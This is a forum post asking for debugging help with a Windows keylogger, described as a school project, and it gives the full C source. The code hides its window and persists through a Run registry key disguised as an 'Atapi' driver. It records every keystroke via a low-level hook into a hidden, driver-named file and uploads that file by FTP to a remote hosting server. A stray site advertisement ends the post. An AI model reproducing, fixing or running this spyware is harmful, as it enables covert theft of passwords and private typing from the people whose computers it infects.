I'm writing an example of a keylogger for my school project. Keylogger works more or less fine, the only problem is that, when it autostarts (on computer reboot with admin rights) it just don't work anymore. The program starts, as I can see it in task manager, but it just stops logging keystrokes completely. Please check the code and tell me what could be the problem. Source file is also in the attachement.
Compiled with Dev C++, don't forget to include -lWininet in linker options.
Code:
#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <wininet.h>
#include <winuser.h>
#include <time.h>
void ToHide()
{
HWND stealth;
stealth = FindWindow("ConsoleWindowClass", NULL);
ShowWindow(stealth, 0);
}
void AutoStart()
{
char Driver[MAX_PATH];
HMODULE HMod;
HKEY hKey;
HMod = GetModuleHandle(NULL);
GetModuleFileName(HMod, Driver, sizeof(Driver));
RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey);
RegSetValueEx(hKey, "Windows Atapi x86_64 Driver", 0, REG_SZ, (const unsigned char *)Driver, MAX_PATH);
RegCloseKey(hKey);
FILE *file;
file = fopen("atapi_x86_64.sys", "r");
if (file != NULL)
{
file = fopen("atapi_x86_64.sys", "a+");
time_t theTime = time(0);
fputs("\n\nStarted logging: ", file);
fputs(ctime(&theTime), file);
fclose(file);
SetFileAttributes("atapi_x86_64.sys", FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN);
fclose(file);
SetFileAttributes(Driver, FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN);
fclose(file);
char szName[50];
SYSTEMTIME Time;
GetLocalTime(&Time);
WORD Dan = Time.wDay;
WORD Mesec = Time.wMonth;
WORD Ura = Time.wHour;
WORD Minute = Time.wMinute;
WORD Sekunde = Time.wSecond;
sprintf(szName, "Keyboard_%d%d%d%d%d.txt", Dan, Mesec, Ura, Minute, Sekunde);
HINTERNET hInternet;
HINTERNET hFtpSession;
hInternet = InternetOpen(NULL, INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
hFtpSession = InternetConnect(hInternet, "ftp.xxx.freehostingcloud.com", INTERNET_DEFAULT_FTP_PORT, "ftp@xxx.freehostingcloud.com", "xxxxxxxx", INTERNET_SERVICE_FTP, 0, 0 );
FtpPutFile(hFtpSession, "atapi_x86_64.sys", szName, FTP_TRANSFER_TYPE_BINARY, 0);
InternetCloseHandle(hFtpSession);
InternetCloseHandle(hInternet);
}
else
{
file = fopen("atapi_x86_64.sys", "a+");
time_t theTime = time(0);
fputs("Started logging: ", file);
fputs(ctime(&theTime), file);
fclose(file);
SetFileAttributes("atapi_x86_64.sys", FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN);
fclose(file);
SetFileAttributes(Driver, FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN);
fclose(file);
}
}
int main(int argc, char *argv[])
{
ToHide();
AutoStart();
StartKeyLogging(argv);
}
int isCapsLock()
{
if ((GetKeyState(VK_CAPITAL) & 0x0001) != 0)
{
return 1;
}
else
{
return 0;
}
}
LRESULT CALLBACK LowLevelKeyboardProc(int nCode, WPARAM wParam, LPARAM lParam)
{
KBDLLHOOKSTRUCT *pKeyBoard = (KBDLLHOOKSTRUCT *)lParam;
FILE *file;
char val[5];
DWORD dwMsg = 1;
char Driver[MAX_PATH];
HMODULE HMod;
HKEY hKey;
HMod = GetModuleHandle(NULL);
GetModuleFileName(HMod, Driver, sizeof(Driver));
RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey);
RegSetValueEx(hKey, "Windows Atapi x86_64 Driver", 0, REG_SZ, (const unsigned char *)Driver, MAX_PATH);
RegCloseKey(hKey);
file = fopen("atapi_x86_64.sys", "a+");
SetFileAttributes("atapi_x86_64.sys", FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN);
switch (wParam)
{
case WM_KEYDOWN:
{
DWORD vkCode = pKeyBoard->vkCode;
if (GetAsyncKeyState(VK_SHIFT))
{
switch (vkCode)
{
case 0x30:
fputs("=", file);
break;
case 0x31:
fputs("!", file);
break;
case 0x32:
fputs("\"", file);
break;
case 0x33:
fputs("#", file);
break;
case 0x34:
fputs("$", file);
break;
case 0x35:
fputs("%", file);
break;
case 0x36:
fputs("&", file);
break;
case 0x37:
fputs("/", file);
break;
case 0x38:
fputs("(", file);
break;
case 0x39:
fputs(")", file);
break;
case 0xBF:
fputs("?", file);
break;
case 0xBB:
fputs("*", file);
break;
case 0xBC:
fputs(";", file);
break;
case 0xBE:
fputs(":", file);
break;
case 0xBD:
fputs("_", file);
break;
case 0xE2:
fputs(">", file);
break;
}
}
else
{
switch (vkCode)
{
case 0x30:
fputs("0", file);
break;
case 0x31:
fputs("1", file);
break;
case 0x32:
fputs("2", file);
break;
case 0x33:
fputs("3", file);
break;
case 0x34:
fputs("4", file);
break;
case 0x35:
fputs("5", file);
break;
case 0x36:
fputs("6", file);
break;
case 0x37:
fputs("7", file);
break;
case 0x38:
fputs("8", file);
break;
case 0x39:
fputs("9", file);
break;
case 0xBF:
fputs("'", file);
break;
case 0xBB:
fputs("+", file);
break;
case 0xBC:
fputs(",", file);
break;
case 0xBE:
fputs(".", file);
break;
case 0xBD:
fputs("-", file);
break;
case 0xE2:
fputs("<", file);
break;
}
}
if (!(GetAsyncKeyState(VK_SHIFT) ^ isCapsLock()))
{
switch (vkCode)
{
case 0x41:
fputs("a", file);
break;
case 0x42:
fputs("b", file);
break;
case 0x43:
fputs("c", file);
break;
case 0xBA:
fputs("č", file);
break;
case 0x44:
fputs("d", file);
break;
case 0x45:
fputs("e", file);
break;
case 0x46:
fputs("f", file);
break;
case 0x47:
fputs("g", file);
break;
case 0x48:
fputs("h", file);
break;
case 0x49:
fputs("i", file);
break;
case 0x4A:
fputs("j", file);
break;
case 0x4B:
fputs("k", file);
break;
case 0x4C:
fputs("l", file);
break;
case 0x4D:
fputs("m", file);
break;
case 0x4E:
fputs("n", file);
break;
case 0x4F:
fputs("o", file);
break;
case 0x50:
fputs("p", file);
break;
case 0x52:
fputs("r", file);
break;
case 0x53:
fputs("s", file);
break;
case 0xDB:
fputs("Å¡", file);
break;
case 0x54:
fputs("t", file);
break;
case 0x55:
fputs("u", file);
break;
case 0x56:
fputs("v", file);
break;
case 0x5A:
fputs("z", file);
break;
case 0xDC:
fputs("ž", file);
break;
case 0x51:
fputs("q", file);
break;
case 0x57:
fputs("w", file);
break;
case 0x59:
fputs("y", file);
break;
case 0x58:
fputs("x", file);
break;
case 0xDE:
fputs("ć", file);
break;
case 0xDD:
fputs("đ", file);
break;
}
}
else
{
switch (vkCode)
{
case 0x41:
fputs("A", file);
break;
case 0x42:
fputs("B", file);
break;
case 0x43:
fputs("C", file);
break;
case 0xBA:
fputs("Č", file);
break;
case 0x44:
fputs("D", file);
break;
case 0x45:
fputs("E", file);
break;
case 0x46:
fputs("F", file);
break;
case 0x47:
fputs("G", file);
break;
case 0x48:
fputs("H", file);
break;
case 0x49:
fputs("I", file);
break;
case 0x4A:
fputs("J", file);
break;
case 0x4B:
fputs("K", file);
break;
case 0x4C:
fputs("L", file);
break;
case 0x4D:
fputs("M", file);
break;
case 0x4E:
fputs("N", file);
break;
case 0x4F:
fputs("O", file);
break;
case 0x50:
fputs("P", file);
break;
case 0x52:
fputs("R", file);
break;
case 0x53:
fputs("S", file);
break;
case 0xDB:
fputs("Å*", file);
break;
case 0x54:
fputs("T", file);
break;
case 0x55:
fputs("U", file);
break;
case 0x56:
fputs("V", file);
break;
case 0x5A:
fputs("Z", file);
break;
case 0xDC:
fputs("Ž", file);
break;
case 0x51:
fputs("Q", file);
break;
case 0x57:
fputs("W", file);
break;
case 0x59:
fputs("Y", file);
break;
case 0x58:
fputs("X", file);
break;
case 0xDE:
fputs("Ć", file);
break;
case 0xDD:
fputs("Đ", file);
break;
}
}
switch (vkCode)
{
case VK_SPACE:
fputs(" ", file);
break;
case 0x2E:
fputs("[Delete]", file);
break;
case VK_BACK:
fputs("[Backspace]", file);
break;
case VK_RETURN:
fputs("[Enter]", file);
break;
case VK_LCONTROL:
fputs("[Ctrl]", file);
break;
case VK_RCONTROL:
fputs("[Ctrl]", file);
break;
case VK_TAB:
fputs("[Tab]", file);
break;
case 0x25:
fputs("[Left Arrow]", file);
break;
case 0x26:
fputs("[Up Arrow]", file);
break;
case 0x27:
fputs("[Right Arrow]", file);
break;
case 0x28:
fputs("[Down Arrow]", file);
break;
case VK_NUMPAD0:
fputs("0", file);
break;
case VK_NUMPAD1:
fputs("1", file);
break;
case VK_NUMPAD2:
fputs("2", file);
break;
case VK_NUMPAD3:
fputs("3", file);
break;
case VK_NUMPAD4:
fputs("4", file);
break;
case VK_NUMPAD5:
fputs("5", file);
break;
case VK_NUMPAD6:
fputs("6", file);
break;
case VK_NUMPAD7:
fputs("7", file);
break;
case VK_NUMPAD8:
fputs("8", file);
break;
case VK_NUMPAD9:
fputs("9", file);
break;
case 0x6F:
fputs("/", file);
break;
case 0x6A:
fputs("*", file);
break;
case 0x6D:
fputs("-", file);
break;
case 0x6B:
fputs("+", file);
break;
case 0x6E:
fputs(",", file);
break;
}
}
case WM_SYSKEYDOWN:
{
DWORD vkCode = pKeyBoard->vkCode;
if (GetAsyncKeyState(VK_RMENU))
{
switch (vkCode)
{
case 0x51:
fputs("\\", file);
break;
case 0x57:
fputs("|", file);
break;
case 0x45:
fputs("€", file);
break;
case 0xDB:
fputs("÷", file);
break;
case 0xDD:
fputs("×", file);
break;
case 0x46:
fputs("[", file);
break;
case 0x47:
fputs("]", file);
break;
case 0x4B:
fputs("ł", file);
break;
case 0x4C:
fputs("Ł", file);
break;
case 0xDE:
fputs("ß", file);
break;
case 0xDC:
fputs("¤", file);
break;
case 0x56:
fputs("@", file);
break;
case 0x42:
fputs("{", file);
break;
case 0x4E:
fputs("}", file);
break;
case 0x4D:
fputs("§", file);
break;
case 0xBC:
fputs("<", file);
break;
case 0xBE:
fputs(">", file);
break;
}
}
}
default:
fclose(file);
return CallNextHookEx( NULL, nCode, wParam, lParam );
}
fclose(file);
return 0;
}
DWORD WINAPI KeyLogger(LPVOID lpParameter)
{
HHOOK hKeyHook;
HINSTANCE hExe = GetModuleHandle(NULL);
if (hExe == NULL)
{
return 1;
}
else
{
hKeyHook = SetWindowsHookEx(WH_KEYBOARD_LL, (HOOKPROC)LowLevelKeyboardProc, hExe, 0);
MSG msg;
while (GetMessage(&msg, NULL, 0, 0) != 0)
{
TranslateMessage(&msg);
DispatchMessage(&msg);
}
UnhookWindowsHookEx(hKeyHook);
}
return 0;
}
int StartKeyLogging(char *argv[])
{
HANDLE hThread;
DWORD dwThread;
hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)KeyLogger, (LPVOID) argv[0], 0, NULL);
if (hThread)
{
return WaitForSingleObject(hThread, INFINITE);
}
else
{
return 1;
}
}
* The Best Reasons to Target Windows 8
Learn some of the best reasons why you should seriously consider bringing your Android mobile development expertise to bear on the Windows 8 platform.
Reply With Quote